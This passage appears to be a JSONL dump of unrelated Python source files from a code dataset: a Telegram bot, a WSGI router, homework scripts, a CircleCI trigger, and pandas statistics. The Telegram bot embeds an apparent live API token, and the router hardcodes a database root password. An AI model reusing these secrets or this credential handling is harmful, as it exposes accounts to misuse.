print(((1/2)*self.length*self.height))\n \n def rectangle(self):\n print(self.length*self.breadth)\n \n def circle(self):\n self.radius = 10\n print(3.142*self.radius*self.radius)\n \n \n def show(self, user):\n self.user = user\n if self.user == 1:\n Areas.square(self)\n \n elif self.user == 2:\n Areas.triangle(self)\n \n elif self.user == 3:\n Areas.rectangle(self)\n \n elif self.user == 4:\n Areas.circle(self)\n \n else:\n print(\"invalid\")\n \ns = Areas(20, 30)\nprint(\"1.square\")\nprint(\"2.triangle\")\nprint(\"3.rectangle\")\nprint(\"4.circle\")\ns.show(int(input(\"enter the option:\")))\n\n","sub_path":"areas.py","file_name":"areas.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"639665320","text":"from datetime import datetime\n\nimport pytest\n\nfrom app.database.dbo.mottak import Metadatafil as Metadatafil_DBO\nfrom app.database.mappers.metadatafil import map_dbo2model\nfrom app.domain.models.Metadatafil import Metadatafil\n\n\n@pytest.fixture\ndef _dbo():\n return Metadatafil_DBO(\n id=1,\n type='xml/mets',\n innhold='innhold',\n filnavn='filnavn',\n opprettet=datetime.fromisoformat('2020-10-13 00:00:00'),\n )\n\n\ndef test_map_dbo2model(_dbo):\n \"\"\"\"\n GIVEN a database object of type Metadatafil\n WHEN calling the method map_dbo2model\n THEN check that the returned domain object Metadatafil is correct\n \"\"\"\n expected = Metadatafil(\n id_=1,\n type_='xml/mets',\n innhold='innhold',\n filnavn='filnavn',\n opprettet=datetime.fromisoformat('2020-10-13 00:00:00'),\n )\n\n actual = map_dbo2model(_dbo)\n\n assert vars(actual) == vars(expected)\n","sub_path":"mottak-arkiv-service/tests/database/mappers/test_metadatafil.py","file_name":"test_metadatafil.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"561093306","text":"#!/usr/bin/python\n\n\"\"\"\n This is the code to accompany the Lesson 3 (decision tree) mini-project.\n\n Use a Decision Tree to identify emails from the Enron corpus by author:\n Sara has label 0\n Chris has label 1\n\"\"\"\nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import accuracy_score\n\nskip = False\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\nprint(len(features_train[0]))\n\nif not skip:\n clf = DecisionTreeClassifier(random_state=0)\n t0 = time()\n clf.fit(features_train, labels_train)\n t1 = time()\n predictions = clf.predict(features_test)\n accuracy = accuracy_score(labels_test, predictions)\n print(\"Trainning time {}s with an accuracy of: {}%\".format(round(t1-t0), accuracy*100))\n","sub_path":"decision_tree/dt_author_id.py","file_name":"dt_author_id.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"441333528","text":"#!/usr/bin/env python3.6\n# coding: utf-8\n\"\"\"\ndescription:\n\n\"\"\"\nfrom wsgiref.simple_server import make_server\nimport re\nfrom webob import Response, Request, dec, exc\n\n\nclass Dict2Obj:\n def __init__(self, d: dict):\n self.__dict__[\"_dict\"] = d\n\n def __getattr__(self, item):\n try:\n return self._dict[item]\n except KeyError:\n raise AttributeError(\"Attribute {} not found\".format(item))\n\n def __setattr__(self, key, value):\n raise NotImplementedError\n\n\nclass Context(dict):\n def __getattr__(self, item):\n try:\n return self[item]\n except KeyError:\n raise AttributeError(\"Attribute {} not Found\".format(item))\n\n def __setattr__(self, key, value):\n self[key] = value\n\n\nclass NestedContext(Context):\n def __init__(self, globalcontext: Context = None):\n super().__init__()\n self.relate(globalcontext)\n\n def relate(self, globalcontext: Context = None):\n self.global_context = globalcontext\n\n def __getattr__(self, item):\n if item in self.keys():\n return self[item]\n return self.global_context[item]\n\n\nclass Router:\n TYPECAST = {\n \"str\": str,\n \"word\": str,\n \"int\": int,\n \"float\": float,\n \"ant\": str\n }\n\n TYPE_PATTERN = {\n \"str\": r\"[^/]+\",\n \"word\": r\"\\w+\",\n \"int\": r\"[+-]?\\d+\",\n \"float\": r\"[+-]?\\d+\\.\\d+\",\n \"and\": r\".+\"\n }\n\n PATTERN = re.compile(\"/({[^{}:]+:?[^{}:]*})\")\n\n def transform(self, kv: str):\n name, type_param = kv.strip(\"/{}\").split(\":\")\n return \"/(?P<{}>{})\".format(name, self.TYPE_PATTERN.get(type_param, \"\\w+\")), name, self.TYPECAST.get(type_param,\n str)\n\n def parse(self, src: str):\n start = 0\n res = \"\"\n translator = {}\n while True:\n matcher = self.PATTERN.search(src, start)\n if matcher:\n res += matcher.string[start:matcher.start()]\n tmp = self.transform(matcher.string[matcher.start():matcher.end()])\n # : ('/(?[^/]+)', 'name', )\n res += tmp[0]\n translator[tmp[1]] = tmp[2]\n start = matcher.end()\n else:\n break\n if res:\n return res, translator\n else:\n return src, translator\n\n def __init__(self, prefix: str = \"\"):\n self.__prefix = prefix.rstrip(\"/\\\\\")\n self.__route_table = []\n self.pre_intercepter = []\n self.post_intercepter = []\n self.ctx = NestedContext()\n\n @property\n def prefix(self):\n return self.__prefix\n\n def register_preintercepter(self, fn):\n self.pre_intercepter.append(fn)\n return\n\n def register_postintercepter(self, fn):\n self.post_intercepter.append(fn)\n return fn\n\n def route(self, rule, *method):\n def wrapper(handler):\n pattern, translator = self.parse(rule)\n self.__route_table.append((method, re.compile(pattern), translator, handler))\n return handler\n\n return wrapper\n\n def get(self, pattern):\n return self.route(pattern, \"GET\") # 加了一个参数已经形成调用条件了\n\n def post(self, pattern):\n return self.route(pattern, \"POST\")\n\n def match(self, request: Request):\n if not request.path.startswith(self.prefix): # 减少嵌套层次\n return\n for fn in self.pre_intercepter:\n request = fn(self.ctx, request)\n for methods, pattern, translator, handler in self.__route_table:\n if not methods or request.method.upper() in methods:\n matcher = pattern.match(request.path.replace(self.prefix, \"\")) # pattern 是prefix后面的所以匹配的字符串也需要去掉prefix\n if matcher:\n new_dict = {}\n for k, v in matcher.groupdict().items():\n new_dict[k] = translator[k](v)\n request.kwargs = Dict2Obj(new_dict) # request.kwargs.k -> k可以直接访问\n response = handler(request)\n for fn in self.post_intercepter:\n response = fn(self.ctx, request, response)\n return response\n\n\nclass Application:\n ctx = Context()\n\n def __init__(self, **kwargs):\n self.ctx.app = self\n for k, v in kwargs:\n self.ctx[k] = v\n\n ROUTERs = []\n\n PRE_INTERCEPTER = []\n\n POST_INTERCEPTER = []\n\n @classmethod\n def register_preintercepter(cls, fn):\n cls.PRE_INTERCEPTER.append(fn)\n return fn\n\n @classmethod\n def register_postintercepter(cls, fn):\n cls.POST_INTERCEPTER.append(fn)\n return fn\n\n @classmethod\n def register(cls, router: Router):\n router.ctx.relate(cls.ctx)\n router.ctx.router = router\n cls.ROUTERs.append(router)\n\n @dec.wsgify\n def __call__(self, request: Request):\n for fn in self.PRE_INTERCEPTER:\n request = fn(self.ctx, request)\n for router in self.ROUTERs:\n response = router.match(request)\n for fn in self.POST_INTERCEPTER:\n response = fn(self.ctx, request, response)\n if response: # handler(request) 返回的就是处理好的对象,直接抛给浏览器\n return response\n raise exc.HTTPNotFound(\"wrongpage\")\n\n\nidx = Router() # prefix根\n# id1 = Router() # prefix根\npy = Router(\"/python\") # prefix python\nApplication.register(idx) # prefix注册,前缀应用名很少,所以这个是可以定义有限个很少..\nApplication.register(py) # 路由对象已经注册到应用中的类属性了,\n\n\n@idx.get(\"^/$\")\ndef index(request: Request): # index = idx.get(\"^/$\")(index) ->index = idx.route(self, rule, *method)(index)\n res = Response()\n res.status_code = 200\n # res.content_type=\"text/html\"\n print(request)\n res.text = \"

luckynginx

\"\n return res\n\n\n@idx.get(\"/{id:int}\")\ndef index1(request: Request): # index = idx.get(\"^/$\")(index) ->index = idx.route(self, rule, *method)(index)\n res = Response()\n res.status_code = 200\n # res.content_type=\"text/html\"\n print(request)\n res.text = \"

luckynginx->{}

\".format(request.kwargs.id)\n return res\n\n\n@idx.get(\"^/python$\")\ndef index(request: Request):\n res = Response()\n res.status_code = 200\n print(request)\n # res.content_type=\"text/html\"\n res.text = \"

luckynginx_python

\"\n return res\n\n\n# @py.route(\"^/(\\w+)$\")\n# def show_python(request: Request):\n# print(request)\n# res = Response()\n# res.text = \"ma_ge to python\"\n# return res\n\n\n@py.route(\"/{product:str}\")\ndef show_python_product(request: Request):\n print(request)\n res = Response()\n res.text = \"product no.{}\".format(request.kwargs.product)\n return res\n\n\n@Application.register_preintercepter\ndef show_headers(ctx: Context, request: Request):\n print(ctx.items())\n print(request.path, \"Paaaaaaaaaaaaaaaath\")\n print(request.user_agent, \"agentttttttttttt\")\n return request\n\n\n@py.register_preintercepter\ndef show_prefix(ctx: Context, request: Request):\n print(\"_____________prefix = {}\".format(ctx.router.prefix))\n return request\n\n\nif __name__ == '__main__':\n from 数据库连接.仿orm框架.conpool import ConnPoo\n httpd = make_server('0.0.0.0', 8000, Application( ))\n try:\n pool = ConnPoo(3,\"172.16.101.56\",\"root\",\"123456\",\"test\")\n with pool as cursor:\n with cursor:\n cursor.execute(\"select * from salaries\")\n for i in cursor:\n print(i)\n httpd.serve_forever()\n\n except KeyboardInterrupt:\n httpd.shutdown()\n httpd.server_close()\n","sub_path":"wsgi_server/webob_app_router_newdict_intercepter.py","file_name":"webob_app_router_newdict_intercepter.py","file_ext":"py","file_size_in_byte":7922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"612655795","text":"from building import *\nImport('rtconfig')\n\nsrc = []\ncwd = GetCurrentDir()\n\nsrc = Glob('*.c')\nsrc += Glob('src/*.c')\n\n\n# add ds18b20 include path.\npath = [cwd + '/inc']\n\n# add src and include to group.\ngroup = DefineGroup('pcap', src, depend = [''], CPPPATH = path)\nReturn('group')","sub_path":"packages/pcap/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30463872","text":"#!/usr/bin/env python3\n\"\"\"\nTriggers an ad-hoc job in CircleCI with temporary environment variables set, via their v1.1 API\n\"\"\"\n\nimport argparse\nimport os\nimport requests\nimport json\nimport sys\nimport urllib\n\n\ndef trigger_circleci_build(job_args, github_owner, github_repo, git_branch, circle_token):\n \"\"\"Triggers a CircleCI job with temporary environment variables\"\"\"\n\n url = \"https://circleci.com/api/v1.1/project/github/%s/%s/tree/%s?circle-token=%s\" % (github_owner, github_repo, urllib.parse.quote_plus(git_branch), circle_token)\n payload = { 'build_parameters': job_args }\n\n response = requests.post(url, json=payload)\n response.raise_for_status()\n\n\ndef main():\n \"\"\"Triggers a CircleCI job from the CLI\"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--repo', required=True)\n parser.add_argument('--branch', required=True)\n parser.add_argument('--circle-job', required=True)\n args = parser.parse_args()\n github_owner=os.environ['GITHUB_OWNER']\n circle_token=os.environ['CIRCLECI_TOKEN']\n\n job_args = {}\n for key in os.environ:\n if key.startswith(\"CIRCLECI_JOB_ENV_\"):\n job_args[key.lstrip(\"CIRCLECI_JOB_ENV_\")] = os.environ[key]\n\n job_args['CIRCLE_JOB'] = args.circle_job\n trigger_circleci_build(job_args, github_owner, args.repo, args.branch, circle_token)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"trigger_circleci_job.py","file_name":"trigger_circleci_job.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"650012292","text":"# Brian Mar\r\n# CSC 110\r\n# Section 05\r\n# April 24,2013\r\n# Assignment 3\r\n\r\n# This program is a modified version of TreeTest3.py file that adds high-level\r\n# design elements to make a total of 12 high-level elements. The TreeTest3.py\r\n# was modified to fulfill requirements for Assignment #3.\r\n\r\n\r\n# TreeTest3.py\r\n# This sample program demonstrates drawing shapes\r\n# on a canvas using some Gui tools.\r\n#\r\n# Study the program GuiTest3.py before working with this program.\r\n#\r\n# This program is not interactive. It draws the same\r\n# picture every time it is executed.\r\n#\r\n# To run this program, you must save the file Gui3.py\r\n# in the same folder as this program.\r\n#\r\n# CSC 110\r\n# W'13 (Python 3 version)\r\n\r\n# Required import statement for Gui tools\r\nimport Gui3\r\n\r\n# Named Constants \r\nCANVAS_WIDTH = 640\r\nCANVAS_HEIGHT = 480\r\n\r\n# Function Definition Section\r\n\r\n# Draws one tree. The parmeters base_x and base_y specify\r\n# the location of a point at the center of the bottom edge\r\n# of the tree trunk. The last parameter is the height of\r\n# the tree. All parameters have units of pixels.\r\ndef draw_simple_tree(base_x, base_y, height):\r\n # draw trunk\r\n trunk_x1 = base_x - height * 0.05\r\n trunk_x2 = base_x + height * 0.05\r\n trunk_y1 = base_y\r\n trunk_y2 = base_y + height * 0.5\r\n canvas.rectangle([[trunk_x1, trunk_y1], [trunk_x2, trunk_y2]], \\\r\n fill='brown', width = 0)\r\n # draw crown\r\n # the polygon has 3 points, peak, lower left (LL), and lower right (LR)\r\n LL_x = base_x - height * 0.2\r\n LR_x = base_x + height * 0.2\r\n L_y = base_y + height * 0.3\r\n canvas.polygon([[base_x, base_y + height], [LL_x, L_y], [LR_x, L_y]], \\\r\n fill='darkgreen', width=0)\r\n\r\n# Draws a cluster of three trees. The parmeters x and y specify\r\n# the location of a point at the center of the bottom edge\r\n# of the tree trunk of the largest tree in the cluster.\r\n# The last parameter is the \"size\" of the cluster -- the distance\r\n# in pixels from the bottom to the top of the cluster.\r\ndef draw_tree_cluster(x, y, size):\r\n draw_simple_tree(x - size * 0.15, y + size * 0.5, size * 0.5)\r\n draw_simple_tree(x - size * 0.3, y + size * 0.3, size * 0.6)\r\n draw_simple_tree(x, y, size * 0.8)\r\n\r\n# Draws a snowman made up of 3 circles. The parameters x and y specify\r\n# the location of the center point of the circle. The last parameter is\r\n# \"h\" which is the height of the snowman\r\ndef draw_snowman(cx, cy, h):\r\n # Draws the head,middle, and lower body\r\n canvas.circle ([cx, cy + h * (85/125)], h * (15/125), \\\r\n fill = 'white')\r\n canvas.circle ([cx, cy + h * (50/125)], h * (20/125), fill = 'white')\r\n canvas.circle([cx, cy], h * (30/125), fill = 'white')\r\n # Eyes\r\n canvas.circle([cx + h * (7.5/125), cy + h * (92.5/125)], h * (2/125), \\\r\n fill = 'black')\r\n canvas.circle([cx - h * (7.5/125), cy + h * (92.5/125)], h * (2/125), \\\r\n fill = 'black')\r\n # Nose\r\n canvas.polygon([[cx - h * (3.75/125), cy + h * (80/125)] \\\r\n , [cx + h * (3.75/125), cy + h * (80/125)] \\\r\n , [cx, cy + h * (88.75/125)]], fill = 'blue', width =0)\r\n # Mouth\r\n canvas.line([[cx + h * (5/125), cy + h * (75/125)]\\\r\n ,[cx - h * (5/125), cy + h * (75/125)]], fill='red', width=2)\r\n # Buttons\r\n canvas.circle ([cx, cy + h * (50/125)], h * (2/125), \\\r\n fill = 'green')\r\n canvas.circle ([cx, cy + h * (40/125)], h * (2/125), \\\r\n fill = 'green')\r\n canvas.circle ([cx, cy + h * (60/125)], h * (2/125), \\\r\n fill = 'green')\r\n\r\n# Draws a sun made up of 1 circles in the corner. The parameters x and y specify\r\n# the location of the center point of the circle. The last parameter is\r\n# \"r\" which is the radius of the circle\r\ndef draw_sun(x,y,r):\r\n canvas.circle([x, y], r, fill = 'yellow')\r\n canvas.line([[x - r * (8/60), y - r * (60/60)]\\\r\n , [x - r * (20/60), y - r * (100/60)]])\r\n canvas.line([[x - r * (40/60), y - r * (45/60)]\\\r\n , [x - r * (60/60), y - r * (80/60)]])\r\n canvas.line([[x - r * (60/60), y - r * (10/60)]\\\r\n , [x - r * (90/60), y - r * (40/60)]])\r\n \r\n# Draws a cloud made up of circles. The parameters x and y specify\r\n# the location of the center point of the circle. The last parameter is\r\n# \"r\" which is the radius of the circle\r\ndef draw_cloud(x,y,ch):\r\n canvas.oval([[x + ch * (15/120),y + ch * (5/120)] \\\r\n ,[x + ch * (85/120), y - ch * (25/120)]] \\\r\n , fill= 'blue', width = 0)\r\n canvas.circle([x,y], ch * (30/120), fill= 'blue', width = 0)\r\n canvas.circle([x + ch * (30/120), y + ch * (20/120)] \\\r\n , ch * (22/120), fill= 'blue', width = 0)\r\n canvas.circle([x + ch * (60/120), y + ch * (20/120)], ch * (20/120) \\\r\n , fill= 'blue', width = 0)\r\n canvas.circle([x + ch * (85/120), y + ch * (10/120)], ch * (20/120) \\\r\n , fill = 'blue', width = 0)\r\n canvas.circle([x + ch * (95/120), y - ch * (15/120)], ch * (20/120) \\\r\n , fill= 'blue', width = 0)\r\n canvas.oval([[x,y],[x + ch * (90/120), y - ch * (45/120)]] \\\r\n ,fill= 'blue', width = 0)\r\n\r\n#Draws a house based on x as the x-central point, y as the y-central point\r\n#and h as the height of the house. These three parameters help build the house.\r\ndef draw_house(x,y,h):\r\n canvas.rectangle([[x - h * (40/160), y + h * (40/160)] \\\r\n , [x + h * (40/160), y - h * (40/160)]], fill = 'red' \\\r\n , width = 0)\r\n canvas.oval([[x + h * (20/160), y + h * (100/160)] \\\r\n , [x + h * (60/160), y + h * (75/160)]], fill = 'gray' \\\r\n , width = 0) \r\n canvas.rectangle([[x + h * (20/160), y + h * (40/160)] \\\r\n , [x + h * (40/160), y + h * (80/160)]], fill = 'brown' \\\r\n , width = 0) \r\n canvas.polygon([[x - h * (40/160), y + h * (40/160)], [x, y + h * (80/160)] \\\r\n ,[x + h * (40/160), y + h * (40/160)]], fill = 'black' \\\r\n , width = 0)\r\n \r\n\r\ndef main():\r\n # draw things on the canvas\r\n draw_tree_cluster(0, 0, 50)\r\n draw_tree_cluster(-40, -30, 65)\r\n draw_tree_cluster(60, -120 , 120)\r\n draw_simple_tree(-80, -150, 140)\r\n draw_simple_tree(-100, -180, 160)\r\n draw_snowman(240, -160, 125)\r\n draw_snowman(180, -50, 75)\r\n draw_sun(320, 240, 60)\r\n draw_cloud(-240, 180, 120)\r\n draw_cloud(-70, 160, 100)\r\n draw_cloud(120, 180, 75)\r\n draw_house(-200, -20, 160)\r\n draw_house(0, -200, 90)\r\n \r\n\r\n#####################################################################\r\n#\r\n# DO NOT CHANGE ANYTHING BELOW THIS LINE\r\n#\r\n#####################################################################\r\n\r\n# Setup the canvas -- canvas is the drawing area\r\n# Note that 'win' and 'canvas' are GLOBAL VARIABLES in this program\r\nwin = Gui3.Gui()\r\nwin.title('Playing around with Gui')\r\ncanvas = win.ca(width = CANVAS_WIDTH, height = CANVAS_HEIGHT)\r\n\r\n# run the main function\r\nmain()\r\n\r\n# show the window\r\nwin.mainloop()\r\n\r\n# Here are some colors you can use: 'white', 'gray', 'black', 'red',\r\n# 'green', 'blue', 'cyan', 'yellow', 'magenta', 'brown', 'darkgreen'\r\n# Hundreds of colors here: http://tmml.sourceforge.net/doc/tk/colors.html\r\n\r\n","sub_path":"Assignments/Assignment 3.py","file_name":"Assignment 3.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"439655690","text":"from telegram.ext import Updater, CommandHandler\nfrom telegram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton\n\nimport logging\nimport random\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\nserver_updater = Updater(token='507313417:AAGRTVRJJ6hA_c_TXZzM-x3bIz4jNV-MWqA')\ndispatcher = server_updater.dispatcher\n\n\nfrom functools import wraps\n\nBOT_LINK = \"http://t.me/clue_test_bot\"\n\ndef group_only(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n print(\"In wrapper\")\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n\n if user_id == chat_id:\n bot.send_message(chat_id=update.message.chat_id, text=\"You can post this command only from game group\")\n return\n return func(bot, update, *args, **kwargs)\n return wrapped\n\ndef user_only(func):\n @wraps(func)\n def wrapped(bot, update, *args, **kwargs):\n user_id = update.effective_user.id\n chat_id = update.message.chat_id\n\n if user_id != chat_id:\n bot.send_message(chat_id=update.message.chat_id, text=\"In order to post this command you must address the bot directly.\\nTry resending in %s\" % (BOT_LINK))\n return\n return func(bot, update, *args, **kwargs)\n return wrapped\n\n\n\nupdate_history = []\ndef test(bot, update):\n update_history.append(update)\n updates = bot.get_updates()\n print(\"Starting\")\n print([u.message.text for u in updates]) \n bot.send_message(chat_id=update.message.chat_id, text=\"I'm a bot, please talk to me!\")\ndispatcher.add_handler(CommandHandler('test', test))\n\n@group_only\ndef intro(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"Hello everybody. Welcome to `THE CLUE`. Please everybody say /hi\")\n\n\nactive_users = {}\ntools = [\"Hose\", \"Club\", \"Sword\"]\nrooms = [\"Badroom\", \"Kitchen\", \"Closets\"]\nmurder_info = None \n\n@group_only\ndef register_user(bot, update):\n fullname = update.effective_user.full_name\n uid = update.effective_user.id \n bot.send_message(chat_id=update.message.chat_id, text=\"Hi, %s, welcome to our little game\" % (fullname) )\n active_users[uid] = fullname\n\n@group_only\ndef make_murder(bot, update):\n #TODO: kill works onlu once a game. \n global murder_info\n murder_info = (random.choice(tools), random.choice(rooms), random.choice(list(active_users.keys())))\n text = \"Someone commited a murder! Alas! \\nHe used one of the follwing tools:\\n\\t\\t{0} \\n\" \\\n \"It was in room:\\n\\t\\t{1} \\n\" \\\n \"And the murdrer might be...\\n\\t\\t{2}\".format(\"\\n\\t\\t\".join(tools),\"\\n\\t\\t\".join(rooms),\"\\n\\t\\t\".join(active_users.values()))\n bot.send_message(chat_id=update.message.chat_id, text=text)\n bot.send_message(chat_id=update.message.chat_id, text=\"In order to guess, send me /guess privatly.\")\n\nreply_keyboard = [['Age', 'Favourite colour'],\n ['Number of siblings', 'Something else...'],\n ['Done']]\nmarkup = ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True)\n\n@user_only\ndef guess(bot, update):\n print(update.message.chat_id ,update.effective_user.id)\n if update.message.chat_id == update.effective_user.id:\n if not update.effective_user.id in active_users:\n bot.send_message(chat_id=update.message.chat_id, text=\"I don't know you. Please join a game\")\n update.message.reply_text(\n \"Hi! My name is Doctor Botter. I will hold a more complex conversation with you. \"\n \"Why don't you tell me something about yourself?\",\n reply_markup=markup)\n else:\n bot.send_message(chat_id=update.message.chat_id, text=\"In order to make a guess, send me a private message at {0}\".format(BOT_LINK))\n\n@group_only\ndef endgame(bot, update):\n pass #TODO: implement\n\ndispatcher.add_handler(CommandHandler('intro', intro))\ndispatcher.add_handler(CommandHandler('hi', register_user))\ndispatcher.add_handler(CommandHandler('kill', make_murder))\ndispatcher.add_handler(CommandHandler('guess', guess))\n\nserver_updater.start_polling()\nserver_updater.idle()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"440808771","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nimport pandas\r\nimport json\r\n\r\n# df = pandas.read_csv('sid_info_test.csv')\r\ndf = pandas.read_csv('sid_info_new.csv')\r\ndf = df.drop('Unnamed: 16', 1)\r\n\r\n\r\ndf.columns = [u'sid', u'tel', u'province', u'city',\r\n u'telecom', u'crawler_channel', u'crawl_status', u'crawl_msg',\r\n u'login_status', u'login_msg', u'report_status', u'report_msg',\r\n u'start_time', u'login_time', u'end_time', u'report_create_time']\r\n\r\n\r\n# print df.columns\r\n# print df.tail()\r\n# print df.groupby('telecom')['telecom'].count()\r\n# print df.groupby('telecom')['login_status']\r\n\r\n # print total_each\r\n # print login_true_each, login_true_pct\r\n # print crawl_true_each, crawl_true_pct\r\n # print report_true_each, report_true_pct\r\n # exit()\r\n# 数据格式化\r\ndf['login_used'] = df['login_time'] - df['start_time']\r\ndf['crawl_used'] = df['end_time'] - df['login_time']\r\ndf['report_used'] = df['report_create_time'] - df['end_time']\r\ndf['crawler_channel'] = df['crawler_channel'].fillna('yulore')\r\ndf['province'] = df['province'].fillna('未知')\r\ndf['city'] = df['city'].fillna('未知')\r\n\r\n# print df.loc[(~(df.login_status.isin([0]) )) & (df.crawler_channel == 'xinde')]\r\n# print df.groupby('crawler_channel')['crawler_channel'].count()\r\n# df = df.fillna(-99)\r\n\r\ndef get_stats(df):\r\n total = df.shape[0]\r\n login_true = df.loc[df.login_status == 0].shape[0]\r\n crawl_true = df.loc[(df.login_status == 0) & (df.crawl_status == 0)].shape[0]\r\n report_true = df.loc[(df.login_status == 0) & (df.crawl_status == 0) & (df.report_status == 0)].shape[0]\r\n login_true_pct = login_true*100.0/total\r\n crawl_true_pct = crawl_true*100.0/login_true\r\n report_true_pct = report_true*100.0/crawl_true\r\n # print login_true, crawl_true, report_true, report_true_pct\r\n return {\r\n \"total\": total,\r\n \"login_true\": login_true,\r\n \"login_true_pct\": login_true_pct,\r\n \"crawl_true\": crawl_true,\r\n \"crawl_true_pct\": crawl_true_pct,\r\n \"report_true\": report_true,\r\n \"report_true_pct\": report_true_pct,\r\n }\r\n\r\ndef groupd_stats(df, groupd=None):\r\n data_list = list()\r\n if len(groupd) == 1:\r\n for k1,group in df.groupby(groupd):\r\n # print k1\r\n stats_dict = get_stats(group)\r\n stats_dict.update({groupd[0]: k1})\r\n data_list.append(stats_dict)\r\n elif len(groupd) == 2:\r\n for (k1,k2),group in df.groupby(groupd):\r\n # print k1,k2\r\n stats_dict = get_stats(group)\r\n stats_dict.update({groupd[0]: k1, groupd[1]: k2})\r\n data_list.append(stats_dict)\r\n elif len(groupd) == 3:\r\n for (k1,k2,k3),group in df.groupby(groupd):\r\n # print k1,k2,k3\r\n stats_dict = get_stats(group)\r\n stats_dict.update({groupd[0]: k1, groupd[1]: k2, groupd[2]: k3})\r\n data_list.append(stats_dict)\r\n return sorted(data_list, key=lambda k: k.get('total', 0), reverse=True)\r\n\r\n# 总览\r\nall_stats = get_stats(df)\r\n# print all_stats\r\n\r\n# 运营商\r\ncxcc_stats = groupd_stats(df, groupd=['telecom'])\r\n# print cxcc_stats\r\n\r\n# 运营商,地区\r\nprov_cxcc_stats = groupd_stats(df, groupd=['province', 'telecom'])\r\n# print prov_cxcc_stats\r\n\r\n# 渠道\r\nchannel_stats = groupd_stats(df, groupd=['crawler_channel'])\r\n# print channel_stats\r\n\r\n# 运营商,渠道\r\nchannel_cxcc_stats = groupd_stats(df, groupd=['crawler_channel', 'telecom'])\r\n# print channel_cxcc_stats\r\n\r\n# 运营商,地区,渠道\r\nchannel_prov_cxcc_stats = groupd_stats(df, groupd=['crawler_channel', 'province', 'telecom'])\r\n# print channel_prov_cxcc_stats\r\n\r\n\r\n# 失败原因分析\r\nimport operator\r\nerror_dict = df.groupby('crawl_status')['crawl_status'].count().sort_values(ascending=False).to_dict()\r\nerror_list = sorted(error_dict.items(), key=operator.itemgetter(1), reverse=True)\r\n# print error_list,len(error_list)\r\n\r\n# exit()\r\n\r\ndf = df.loc[(df.login_used >= 1) & (df.crawl_used >= 1) & (df.crawl_used <= 300) & ( df.report_used >= 1) & (df.report_used <= 140)]\r\n\r\n# 耗时\r\ndef used_stats(df, pattern='crawl_used'):\r\n used_min = df[pattern].min()\r\n used_max = df[pattern].max()\r\n used_mean = df[pattern].mean()\r\n used_75 = df[pattern].quantile(0.75)\r\n used_98 = df[pattern].quantile(0.98)\r\n return {\r\n \"used_min\": used_min,\r\n \"used_max\": used_max,\r\n \"used_mean\": used_mean,\r\n \"used_75\": used_75,\r\n \"used_98\": used_98,\r\n }\r\n# 授权耗时\r\n# print df.loc[df.report_used >= 200].count()\r\nlogin_used = used_stats(df, pattern='login_used')\r\n# print login_used\r\n\r\n# 爬取耗时\r\ncrawl_used = used_stats(df)\r\n# print crawl_used\r\n\r\n# 报告耗时\r\nreport_used = used_stats(df, pattern='report_used')\r\n# print report_used\r\n\r\ndata = {\r\n 'all_stats':all_stats,\r\n 'cxcc_stats':cxcc_stats,\r\n 'prov_cxcc_stats':prov_cxcc_stats,\r\n 'channel_stats':channel_stats,\r\n 'channel_cxcc_stats':channel_cxcc_stats,\r\n 'channel_prov_cxcc_stats':channel_prov_cxcc_stats,\r\n 'error_list':error_list,\r\n 'login_used':login_used,\r\n 'crawl_used':crawl_used,\r\n 'report_used':report_used,\r\n}\r\n\r\nwith open('stats.json', 'w') as fp:\r\n json.dump(data, fp, indent=4, sort_keys=True, ensure_ascii=False)\r\n\r\n# print df.crawl_used.quantile([0.0, .99])\r\n# crawl_groupd = df.groupby('crawl_used')['crawl_used'].count().to_dict()\r\n# report_groupd = df.groupby('report_used')['report_used'].count().to_dict()\r\n# print report_groupd\r\n# login_used_list = df.login_used.tolist()\r\n# crawl_used_list = df.crawl_used.tolist()\r\n# report_used_list = df.report_used.tolist()\r\n#\r\n# print sorted(login_used_list)[-5:]\r\n# print sorted(crawl_used_list)[-5:]\r\n# print sorted(report_used_list)[-5:]\r\n# with open('tongji.txt', 'w') as fp:\r\n# json.dump(crawl_groupd, fp, indent=4, sort_keys=True)\r\n# print df.crawl_used.tolist()\r\n# print df.report_used.tolist()\r\n# print df.login_used.mean()\r\n# print df.crawl_used.mean()\r\n# print df.report_used.mean()\r\n","sub_path":"api/pandas/tongji.py","file_name":"tongji.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"628885507","text":"import numpy as np\nfrom torch.utils.data import Dataset\nfrom torch.utils.data.dataloader import DataLoader\nimport random\nfrom utility.dao_helper import Graph\nimport pandas as pd\n\n\nclass GraphData(object):\n\n def __init__(self, src_idx_list, dst_idx_list, ts_list, e_type_list, 